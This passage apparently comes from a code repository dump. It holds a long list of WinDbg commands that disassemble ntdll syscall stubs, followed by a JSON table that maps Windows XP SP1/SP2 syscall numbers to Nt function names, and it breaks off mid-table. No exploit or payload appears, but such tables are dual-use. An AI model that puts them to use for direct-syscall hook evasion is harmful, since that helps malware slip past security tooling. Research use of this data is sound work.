ntdll!NtDeleteWnfStateName L2\r\nu ntdll!NtDeviceIoControlFile L2\r\nu ntdll!NtDirectGraphicsCall L2\r\nu ntdll!NtDisableLastKnownGood L2\r\nu ntdll!NtDisplayString L2\r\nu ntdll!NtDrawText L2\r\nu ntdll!NtDuplicateObject L2\r\nu ntdll!NtDuplicateToken L2\r\nu ntdll!NtEnableLastKnownGood L2\r\nu ntdll!NtEnumerateBootEntries L2\r\nu ntdll!NtEnumerateDriverEntries L2\r\nu ntdll!NtEnumerateKey L2\r\nu ntdll!NtEnumerateSystemEnvironmentValuesEx L2\r\nu ntdll!NtEnumerateTransactionObject L2\r\nu ntdll!NtEnumerateValueKey L2\r\nu ntdll!NtExtendSection L2\r\nu ntdll!NtFilterBootOption L2\r\nu ntdll!NtFilterToken L2\r\nu ntdll!NtFilterTokenEx L2\r\nu ntdll!NtFindAtom L2\r\nu ntdll!NtFlushBuffersFile L2\r\nu ntdll!NtFlushBuffersFileEx L2\r\nu ntdll!NtFlushInstallUILanguage L2\r\nu ntdll!NtFlushInstructionCache L2\r\nu ntdll!NtFlushKey L2\r\nu ntdll!NtFlushProcessWriteBuffers L2\r\nu ntdll!NtFlushVirtualMemory L2\r\nu ntdll!NtFlushWriteBuffer L2\r\nu ntdll!NtFreeUserPhysicalPages L2\r\nu ntdll!NtFreeVirtualMemory L2\r\nu ntdll!NtFreezeRegistry L2\r\nu ntdll!NtFreezeTransactions L2\r\nu ntdll!NtFsControlFile L2\r\nu ntdll!NtGetCachedSigningLevel L2\r\nu ntdll!NtGetCompleteWnfStateSubscription L2\r\nu ntdll!NtGetContextThread L2\r\nu ntdll!NtGetCurrentProcessorNumber L2\r\nu ntdll!NtGetCurrentProcessorNumberEx L2\r\nu ntdll!NtGetDevicePowerState L2\r\nu ntdll!NtGetMUIRegistryInfo L2\r\nu ntdll!NtGetNextProcess L2\r\nu ntdll!NtGetNextThread L2\r\nu ntdll!NtGetNlsSectionPtr L2\r\nu ntdll!NtGetNotificationResourceManager L2\r\nu ntdll!NtGetWriteWatch L2\r\nu ntdll!NtImpersonateAnonymousToken L2\r\nu ntdll!NtImpersonateClientOfPort L2\r\nu ntdll!NtImpersonateThread L2\r\nu ntdll!NtInitializeEnclave L2\r\nu ntdll!NtInitializeNlsFiles L2\r\nu ntdll!NtInitializeRegistry L2\r\nu ntdll!NtInitiatePowerAction L2\r\nu ntdll!NtIsProcessInJob L2\r\nu ntdll!NtIsSystemResumeAutomatic L2\r\nu ntdll!NtIsUILanguageComitted L2\r\nu ntdll!NtListenPort L2\r\nu ntdll!NtLoadDriver L2\r\nu ntdll!NtLoadEnclaveData L2\r\nu ntdll!NtLoadKey L2\r\nu ntdll!NtLoadKey2 L2\r\nu ntdll!NtLoadKey3 L2\r\nu ntdll!NtLoadKeyEx L2\r\nu ntdll!NtLockFile L2\r\nu ntdll!NtLockProductActivationKeys L2\r\nu ntdll!NtLockRegistryKey L2\r\nu ntdll!NtLockVirtualMemory L2\r\nu ntdll!NtMakePermanentObject L2\r\nu ntdll!NtMakeTemporaryObject L2\r\nu ntdll!NtManageHotPatch L2\r\nu ntdll!NtManagePartition L2\r\nu ntdll!NtMapCMFModule L2\r\nu ntdll!NtMapUserPhysicalPages L2\r\nu ntdll!NtMapUserPhysicalPagesScatter L2\r\nu ntdll!NtMapViewOfSection L2\r\nu ntdll!NtMapViewOfSectionEx L2\r\nu ntdll!NtModifyBootEntry L2\r\nu ntdll!NtModifyDriverEntry L2\r\nu ntdll!NtNotifyChangeDirectoryFile L2\r\nu ntdll!NtNotifyChangeDirectoryFileEx L2\r\nu ntdll!NtNotifyChangeKey L2\r\nu ntdll!NtNotifyChangeMultipleKeys L2\r\nu ntdll!NtNotifyChangeSession L2\r\nu ntdll!NtOpenDirectoryObject L2\r\nu ntdll!NtOpenEnlistment L2\r\nu ntdll!NtOpenEvent L2\r\nu ntdll!NtOpenEventPair L2\r\nu ntdll!NtOpenFile L2\r\nu ntdll!NtOpenIoCompletion L2\r\nu ntdll!NtOpenJobObject L2\r\nu ntdll!NtOpenKey L2\r\nu ntdll!NtOpenKeyEx L2\r\nu ntdll!NtOpenKeyTransacted L2\r\nu ntdll!NtOpenKeyTransactedEx L2\r\nu ntdll!NtOpenKeyedEvent L2\r\nu ntdll!NtOpenMutant L2\r\nu ntdll!NtOpenObjectAuditAlarm L2\r\nu ntdll!NtOpenPartition L2\r\nu ntdll!NtOpenPrivateNamespace L2\r\nu ntdll!NtOpenProcess L2\r\nu ntdll!NtOpenProcessToken L2\r\nu ntdll!NtOpenProcessTokenEx L2\r\nu ntdll!NtOpenRegistryTransaction L2\r\nu ntdll!NtOpenResourceManager L2\r\nu ntdll!NtOpenSection L2\r\nu ntdll!NtOpenSemaphore L2\r\nu ntdll!NtOpenSession L2\r\nu ntdll!NtOpenSymbolicLinkObject L2\r\nu ntdll!NtOpenThread L2\r\nu ntdll!NtOpenThreadToken L2\r\nu ntdll!NtOpenThreadTokenEx L2\r\nu ntdll!NtOpenTimer L2\r\nu ntdll!NtOpenTransaction L2\r\nu ntdll!NtOpenTransactionManager L2\r\nu ntdll!NtPlugPlayControl L2\r\nu ntdll!NtPowerInformation L2\r\nu ntdll!NtPrePrepareComplete L2\r\nu ntdll!NtPrePrepareEnlistment L2\r\nu ntdll!NtPrepareComplete L2\r\nu ntdll!NtPrepareEnlistment L2\r\nu ntdll!NtPrivilegeCheck L2\r\nu ntdll!NtPrivilegeObjectAuditAlarm L2\r\nu ntdll!NtPrivilegedServiceAuditAlarm L2\r\nu ntdll!NtPropagationComplete L2\r\nu ntdll!NtPropagationFailed L2\r\nu ntdll!NtProtectVirtualMemory L2\r\nu ntdll!NtPssCaptureVaSpaceBulk L2\r\nu ntdll!NtPulseEvent L2\r\nu ntdll!NtQueryAttributesFile L2\r\nu ntdll!NtQueryAuxiliaryCounterFrequency L2\r\nu ntdll!NtQueryBootEntryOrder L2\r\nu ntdll!NtQueryBootOptions L2\r\nu ntdll!NtQueryDebugFilterState L2\r\nu ntdll!NtQueryDefaultLocale L2\r\nu ntdll!NtQueryDefaultUILanguage L2\r\nu ntdll!NtQueryDirectoryFile L2\r\nu ntdll!NtQueryDirectoryFileEx L2\r\nu ntdll!NtQueryDirectoryObject L2\r\nu ntdll!NtQueryDriverEntryOrder L2\r\nu ntdll!NtQueryEaFile L2\r\nu ntdll!NtQueryEvent L2\r\nu ntdll!NtQueryFullAttributesFile L2\r\nu ntdll!NtQueryInformationAtom L2\r\nu ntdll!NtQueryInformationByName L2\r\nu ntdll!NtQueryInformationEnlistment L2\r\nu ntdll!NtQueryInformationFile L2\r\nu ntdll!NtQueryInformationJobObject L2\r\nu ntdll!NtQueryInformationPort L2\r\nu ntdll!NtQueryInformationProcess L2\r\nu ntdll!NtQueryInformationResourceManager L2\r\nu ntdll!NtQueryInformationThread L2\r\nu ntdll!NtQueryInformationToken L2\r\nu ntdll!NtQueryInformationTransaction L2\r\nu ntdll!NtQueryInformationTransactionManager L2\r\nu ntdll!NtQueryInformationWorkerFactory L2\r\nu ntdll!NtQueryInstallUILanguage L2\r\nu ntdll!NtQueryIntervalProfile L2\r\nu ntdll!NtQueryIoCompletion L2\r\nu ntdll!NtQueryIoRingCapabilities L2\r\nu ntdll!NtQueryKey L2\r\nu ntdll!NtQueryLicenseValue L2\r\nu ntdll!NtQueryMultipleValueKey L2\r\nu ntdll!NtQueryMutant L2\r\nu ntdll!NtQueryObject L2\r\nu ntdll!NtQueryOpenSubKeys L2\r\nu ntdll!NtQueryOpenSubKeysEx L2\r\nu ntdll!NtQueryPerformanceCounter L2\r\nu ntdll!NtQueryPortInformationProcess L2\r\nu ntdll!NtQueryQuotaInformationFile L2\r\nu ntdll!NtQuerySection L2\r\nu ntdll!NtQuerySecurityAttributesToken L2\r\nu ntdll!NtQuerySecurityObject L2\r\nu ntdll!NtQuerySecurityPolicy L2\r\nu ntdll!NtQuerySemaphore L2\r\nu ntdll!NtQuerySymbolicLinkObject L2\r\nu ntdll!NtQuerySystemEnvironmentValue L2\r\nu ntdll!NtQuerySystemEnvironmentValueEx L2\r\nu ntdll!NtQuerySystemInformation L2\r\nu ntdll!NtQuerySystemInformationEx L2\r\nu ntdll!NtQueryTimer L2\r\nu ntdll!NtQueryTimerResolution L2\r\nu ntdll!NtQueryValueKey L2\r\nu ntdll!NtQueryVirtualMemory L2\r\nu ntdll!NtQueryVolumeInformationFile L2\r\nu ntdll!NtQueryWnfStateData L2\r\nu ntdll!NtQueryWnfStateNameInformation L2\r\nu ntdll!NtQueueApcThread L2\r\nu ntdll!NtQueueApcThreadEx L2\r\nu ntdll!NtQueueApcThreadEx2 L2\r\nu ntdll!NtRaiseException L2\r\nu ntdll!NtRaiseHardError L2\r\nu ntdll!NtReadFile L2\r\nu ntdll!NtReadFileScatter L2\r\nu ntdll!NtReadOnlyEnlistment L2\r\nu ntdll!NtReadRequestData L2\r\nu ntdll!NtReadVirtualMemory L2\r\nu ntdll!NtReadVirtualMemoryEx L2\r\nu ntdll!NtRecoverEnlistment L2\r\nu ntdll!NtRecoverResourceManager L2\r\nu ntdll!NtRecoverTransactionManager L2\r\nu ntdll!NtRegisterProtocolAddressInformation L2\r\nu ntdll!NtRegisterThreadTerminatePort L2\r\nu ntdll!NtReleaseKeyedEvent L2\r\nu ntdll!NtReleaseMutant L2\r\nu ntdll!NtReleaseSemaphore L2\r\nu ntdll!NtReleaseWorkerFactoryWorker L2\r\nu ntdll!NtRemoveIoCompletion L2\r\nu ntdll!NtRemoveIoCompletionEx L2\r\nu ntdll!NtRemoveProcessDebug L2\r\nu ntdll!NtRenameKey L2\r\nu ntdll!NtRenameTransactionManager L2\r\nu ntdll!NtReplaceKey L2\r\nu ntdll!NtReplacePartitionUnit L2\r\nu ntdll!NtReplyPort L2\r\nu ntdll!NtReplyWaitReceivePort L2\r\nu ntdll!NtReplyWaitReceivePortEx L2\r\nu ntdll!NtReplyWaitReplyPort L2\r\nu ntdll!NtRequestPort L2\r\nu ntdll!NtRequestWaitReplyPort L2\r\nu ntdll!NtResetEvent L2\r\nu ntdll!NtResetWriteWatch L2\r\nu ntdll!NtRestoreKey L2\r\nu ntdll!NtResumeProcess L2\r\nu ntdll!NtResumeThread L2\r\nu ntdll!NtRevertContainerImpersonation L2\r\nu ntdll!NtRollbackComplete L2\r\nu ntdll!NtRollbackEnlistment L2\r\nu ntdll!NtRollbackRegistryTransaction L2\r\nu ntdll!NtRollbackTransaction L2\r\nu ntdll!NtRollforwardTransactionManager L2\r\nu ntdll!NtSaveKey L2\r\nu ntdll!NtSaveKeyEx L2\r\nu ntdll!NtSaveMergedKeys L2\r\nu ntdll!NtSecureConnectPort L2\r\nu ntdll!NtSerializeBoot L2\r\nu ntdll!NtSetBootEntryOrder L2\r\nu ntdll!NtSetBootOptions L2\r\nu ntdll!NtSetCachedSigningLevel L2\r\nu ntdll!NtSetCachedSigningLevel2 L2\r\nu ntdll!NtSetContextThread L2\r\nu ntdll!NtSetDebugFilterState L2\r\nu ntdll!NtSetDefaultHardErrorPort L2\r\nu ntdll!NtSetDefaultLocale L2\r\nu ntdll!NtSetDefaultUILanguage L2\r\nu ntdll!NtSetDriverEntryOrder L2\r\nu ntdll!NtSetEaFile L2\r\nu ntdll!NtSetEvent L2\r\nu ntdll!NtSetEventBoostPriority L2\r\nu ntdll!NtSetHighEventPair L2\r\nu ntdll!NtSetHighWaitLowEventPair L2\r\nu ntdll!NtSetIRTimer L2\r\nu ntdll!NtSetInformationDebugObject L2\r\nu ntdll!NtSetInformationEnlistment L2\r\nu ntdll!NtSetInformationFile L2\r\nu ntdll!NtSetInformationIoRing L2\r\nu ntdll!NtSetInformationJobObject L2\r\nu ntdll!NtSetInformationKey L2\r\nu ntdll!NtSetInformationObject L2\r\nu ntdll!NtSetInformationProcess L2\r\nu ntdll!NtSetInformationResourceManager L2\r\nu ntdll!NtSetInformationSymbolicLink L2\r\nu ntdll!NtSetInformationThread L2\r\nu ntdll!NtSetInformationToken L2\r\nu ntdll!NtSetInformationTransaction L2\r\nu ntdll!NtSetInformationTransactionManager L2\r\nu ntdll!NtSetInformationVirtualMemory L2\r\nu ntdll!NtSetInformationWorkerFactory L2\r\nu ntdll!NtSetIntervalProfile L2\r\nu ntdll!NtSetIoCompletion L2\r\nu ntdll!NtSetIoCompletionEx L2\r\nu ntdll!NtSetLdtEntries L2\r\nu ntdll!NtSetLowEventPair L2\r\nu ntdll!NtSetLowWaitHighEventPair L2\r\nu ntdll!NtSetQuotaInformationFile L2\r\nu ntdll!NtSetSecurityObject L2\r\nu ntdll!NtSetSystemEnvironmentValue L2\r\nu ntdll!NtSetSystemEnvironmentValueEx L2\r\nu ntdll!NtSetSystemInformation L2\r\nu ntdll!NtSetSystemPowerState L2\r\nu ntdll!NtSetSystemTime L2\r\nu ntdll!NtSetThreadExecutionState L2\r\nu ntdll!NtSetTimer L2\r\nu ntdll!NtSetTimer2 L2\r\nu ntdll!NtSetTimerEx L2\r\nu ntdll!NtSetTimerResolution L2\r\nu ntdll!NtSetUuidSeed L2\r\nu ntdll!NtSetValueKey L2\r\nu ntdll!NtSetVolumeInformationFile L2\r\nu ntdll!NtSetWnfProcessNotificationEvent L2\r\nu ntdll!NtShutdownSystem L2\r\nu ntdll!NtShutdownWorkerFactory L2\r\nu ntdll!NtSignalAndWaitForSingleObject L2\r\nu ntdll!NtSinglePhaseReject L2\r\nu ntdll!NtStartProfile L2\r\nu ntdll!NtStopProfile L2\r\nu ntdll!NtSubmitIoRing L2\r\nu ntdll!NtSubscribeWnfStateChange L2\r\nu ntdll!NtSuspendProcess L2\r\nu ntdll!NtSuspendThread L2\r\nu ntdll!NtSystemDebugControl L2\r\nu ntdll!NtTerminateEnclave L2\r\nu ntdll!NtTerminateJobObject L2\r\nu ntdll!NtTerminateProcess L2\r\nu ntdll!NtTerminateThread L2\r\nu ntdll!NtTestAlert L2\r\nu ntdll!NtThawRegistry L2\r\nu ntdll!NtThawTransactions L2\r\nu ntdll!NtTraceControl L2\r\nu ntdll!NtTraceEvent L2\r\nu ntdll!NtTranslateFilePath L2\r\nu ntdll!NtUmsThreadYield L2\r\nu ntdll!NtUnloadDriver L2\r\nu ntdll!NtUnloadKey L2\r\nu ntdll!NtUnloadKey2 L2\r\nu ntdll!NtUnloadKeyEx L2\r\nu ntdll!NtUnlockFile L2\r\nu ntdll!NtUnlockVirtualMemory L2\r\nu ntdll!NtUnmapViewOfSection L2\r\nu ntdll!NtUnmapViewOfSectionEx L2\r\nu ntdll!NtUnsubscribeWnfStateChange L2\r\nu ntdll!NtUpdateWnfStateData L2\r\nu ntdll!NtVdmControl L2\r\nu ntdll!NtWaitForAlertByThreadId L2\r\nu ntdll!NtWaitForDebugEvent L2\r\nu ntdll!NtWaitForKeyedEvent L2\r\nu ntdll!NtWaitForMultipleObjects L2\r\nu ntdll!NtWaitForMultipleObjects32 L2\r\nu ntdll!NtWaitForSingleObject L2\r\nu ntdll!NtWaitForWorkViaWorkerFactory L2\r\nu ntdll!NtWaitHighEventPair L2\r\nu ntdll!NtWaitLowEventPair L2\r\nu ntdll!NtWorkerFactoryWorkerReady L2\r\nu ntdll!NtWriteFile L2\r\nu ntdll!NtWriteFileGather L2\r\nu ntdll!NtWriteRequestData L2\r\nu ntdll!NtWriteVirtualMemory L2\r\nu ntdll!NtYieldExecution L2\r\nu ntdll!RtlGetNativeSystemInformation L2\r\n" }, { "path": "start/WinSysCalls.json", "content": "{\"Windows XP\": {\"SP1\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAddBootEntry\", \"103\": \"NtAddDriverEntry\", \"104\": \"NtAdjustGroupsToken\", \"105\": \"NtAlertResumeThread\", \"106\": \"NtAlertThread\", \"107\": \"NtAllocateLocallyUniqueId\", \"108\": \"NtAllocateUserPhysicalPages\", \"109\": \"NtAllocateUuids\", \"110\": \"NtAreMappedFilesTheSame\", \"111\": \"NtAssignProcessToJobObject\", \"112\": \"NtCancelDeviceWakeupRequest\", \"113\": \"NtCompactKeys\", \"114\": \"NtCompareTokens\", \"115\": \"NtCompleteConnectPort\", \"116\": \"NtCompressKey\", \"117\": \"NtConnectPort\", \"118\": \"NtCreateDebugObject\", \"119\": \"NtCreateDirectoryObject\", \"120\": \"NtCreateEventPair\", \"121\": \"NtCreateIoCompletion\", \"122\": \"NtCreateJobObject\", \"123\": \"NtCreateJobSet\", \"124\": \"NtCreateKeyedEvent\", \"125\": \"NtCreateMailslotFile\", \"126\": \"NtCreateMutant\", \"127\": \"NtCreateNamedPipeFile\", \"128\": \"NtCreatePagingFile\", \"129\": \"NtCreatePort\", \"130\": \"NtCreateProcess\", \"131\": \"NtCreateProfile\", \"132\": \"NtCreateSemaphore\", \"133\": \"NtCreateSymbolicLinkObject\", \"134\": \"NtCreateTimer\", \"135\": \"NtCreateToken\", \"136\": \"NtCreateWaitablePort\", \"137\": \"NtDebugActiveProcess\", \"138\": \"NtDebugContinue\", \"139\": \"NtDeleteAtom\", \"140\": \"NtDeleteBootEntry\", \"141\": \"NtDeleteDriverEntry\", \"142\": \"NtDeleteFile\", \"143\": \"NtDeleteKey\", \"144\": \"NtDeleteObjectAuditAlarm\", \"145\": \"NtDeleteValueKey\", \"146\": \"NtDisplayString\", \"147\": \"NtEnumerateBootEntries\", \"148\": \"NtEnumerateDriverEntries\", \"149\": \"NtEnumerateSystemEnvironmentValuesEx\", \"150\": \"NtExtendSection\", \"151\": \"NtFilterToken\", \"152\": \"NtFlushInstructionCache\", \"153\": \"NtFlushKey\", \"154\": \"NtFlushVirtualMemory\", \"155\": \"NtFlushWriteBuffer\", \"156\": \"NtFreeUserPhysicalPages\", \"157\": \"NtGetContextThread\", \"158\": \"NtGetCurrentProcessorNumber\", \"159\": \"NtGetDevicePowerState\", \"160\": \"NtGetPlugPlayEvent\", \"161\": \"NtGetWriteWatch\", \"162\": \"NtImpersonateAnonymousToken\", \"163\": \"NtImpersonateThread\", \"164\": \"NtInitializeRegistry\", \"165\": \"NtInitiatePowerAction\", \"166\": \"NtIsSystemResumeAutomatic\", \"167\": \"NtListenPort\", \"168\": \"NtLoadDriver\", \"169\": \"NtLoadKey\", \"170\": \"NtLoadKey2\", \"171\": \"NtLoadKeyEx\", \"172\": \"NtLockFile\", \"173\": \"NtLockProductActivationKeys\", \"174\": \"NtLockRegistryKey\", \"175\": \"NtLockVirtualMemory\", \"176\": \"NtMakePermanentObject\", \"177\": \"NtMakeTemporaryObject\", \"178\": \"NtMapUserPhysicalPages\", \"179\": \"NtModifyBootEntry\", \"180\": \"NtModifyDriverEntry\", \"181\": \"NtNotifyChangeDirectoryFile\", \"182\": \"NtNotifyChangeKey\", \"183\": \"NtNotifyChangeMultipleKeys\", \"184\": \"NtOpenEventPair\", \"185\": \"NtOpenIoCompletion\", \"186\": \"NtOpenJobObject\", \"187\": \"NtOpenKeyedEvent\", \"188\": \"NtOpenMutant\", \"189\": \"NtOpenObjectAuditAlarm\", \"190\": \"NtOpenProcessToken\", \"191\": \"NtOpenSemaphore\", \"192\": \"NtOpenSymbolicLinkObject\", \"193\": \"NtOpenThread\", \"194\": \"NtOpenTimer\", \"195\": \"NtPlugPlayControl\", \"196\": \"NtPrivilegeCheck\", \"197\": \"NtPrivilegeObjectAuditAlarm\", \"198\": \"NtPrivilegedServiceAuditAlarm\", \"199\": \"NtPulseEvent\", \"200\": \"NtQueryBootEntryOrder\", \"201\": \"NtQueryBootOptions\", \"202\": \"NtQueryDebugFilterState\", \"203\": \"NtQueryDirectoryObject\", \"204\": \"NtQueryDriverEntryOrder\", \"205\": \"NtQueryEaFile\", \"206\": \"NtQueryFullAttributesFile\", \"207\": \"NtQueryInformationAtom\", \"208\": \"NtQueryInformationJobObject\", \"209\": \"NtQueryInformationPort\", \"210\": \"NtQueryInstallUILanguage\", \"211\": \"NtQueryIntervalProfile\", \"212\": \"NtQueryIoCompletion\", \"213\": \"NtQueryMultipleValueKey\", \"214\": \"NtQueryMutant\", \"215\": \"NtQueryOpenSubKeys\", \"216\": \"NtQueryOpenSubKeysEx\", \"217\": \"NtQueryPortInformationProcess\", \"218\": \"NtQueryQuotaInformationFile\", \"219\": \"NtQuerySecurityObject\", \"220\": \"NtQuerySemaphore\", \"221\": \"NtQuerySymbolicLinkObject\", \"222\": \"NtQuerySystemEnvironmentValue\", \"223\": \"NtQuerySystemEnvironmentValueEx\", \"224\": \"NtQueryTimerResolution\", \"225\": \"NtRaiseException\", \"226\": \"NtRaiseHardError\", \"227\": \"NtRegisterThreadTerminatePort\", \"228\": \"NtReleaseKeyedEvent\", \"229\": \"NtRemoveProcessDebug\", \"230\": \"NtRenameKey\", \"231\": \"NtReplaceKey\", \"232\": \"NtReplyWaitReplyPort\", \"233\": \"NtRequestDeviceWakeup\", \"234\": \"NtRequestPort\", \"235\": \"NtRequestWakeupLatency\", \"236\": \"NtResetEvent\", \"237\": \"NtResetWriteWatch\", \"238\": \"NtRestoreKey\", \"239\": \"NtResumeProcess\", \"240\": \"NtSaveKey\", \"241\": \"NtSaveKeyEx\", \"242\": \"NtSaveMergedKeys\", \"243\": \"NtSecureConnectPort\", \"244\": \"NtSetBootEntryOrder\", \"245\": \"NtSetBootOptions\", \"246\": \"NtSetContextThread\", \"247\": \"NtSetDebugFilterState\", \"248\": \"NtSetDefaultHardErrorPort\", \"249\": \"NtSetDefaultLocale\", \"250\": \"NtSetDefaultUILanguage\", \"251\": \"NtSetDriverEntryOrder\", \"252\": \"NtSetEaFile\", \"253\": \"NtSetHighEventPair\", \"254\": \"NtSetHighWaitLowEventPair\", \"255\": \"NtSetInformationDebugObject\", \"256\": \"NtSetInformationJobObject\", \"257\": \"NtSetInformationKey\", \"258\": \"NtSetInformationToken\", \"259\": \"NtSetIntervalProfile\", \"260\": \"NtSetIoCompletion\", \"261\": \"NtSetLdtEntries\", \"262\": \"NtSetLowEventPair\", \"263\": \"NtSetLowWaitHighEventPair\", \"264\": \"NtSetQuotaInformationFile\", \"265\": \"NtSetSecurityObject\", \"266\": \"NtSetSystemEnvironmentValue\", \"267\": \"NtSetSystemEnvironmentValueEx\", \"268\": \"NtSetSystemInformation\", \"269\": \"NtSetSystemPowerState\", \"270\": \"NtSetSystemTime\", \"271\": \"NtSetThreadExecutionState\", \"272\": \"NtSetTimerResolution\", \"273\": \"NtSetUuidSeed\", \"274\": \"NtSetVolumeInformationFile\", \"275\": \"NtShutdownSystem\", \"276\": \"NtSignalAndWaitForSingleObject\", \"277\": \"NtStartProfile\", \"278\": \"NtStopProfile\", \"279\": \"NtSuspendProcess\", \"280\": \"NtSuspendThread\", \"281\": \"NtSystemDebugControl\", \"282\": \"NtTerminateJobObject\", \"283\": \"NtTestAlert\", \"284\": \"NtTranslateFilePath\", \"285\": \"NtUnloadDriver\", \"286\": \"NtUnloadKey\", \"287\": \"NtUnloadKey2\", \"288\": \"NtUnloadKeyEx\", \"289\": \"NtUnlockFile\", \"290\": \"NtUnlockVirtualMemory\", \"291\": \"NtVdmControl\", \"292\": \"NtWaitForDebugEvent\", \"293\": \"NtWaitForKeyedEvent\", \"294\": \"NtWaitHighEventPair\", \"295\": \"NtWaitLowEventPair\"}, \"SP2\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", 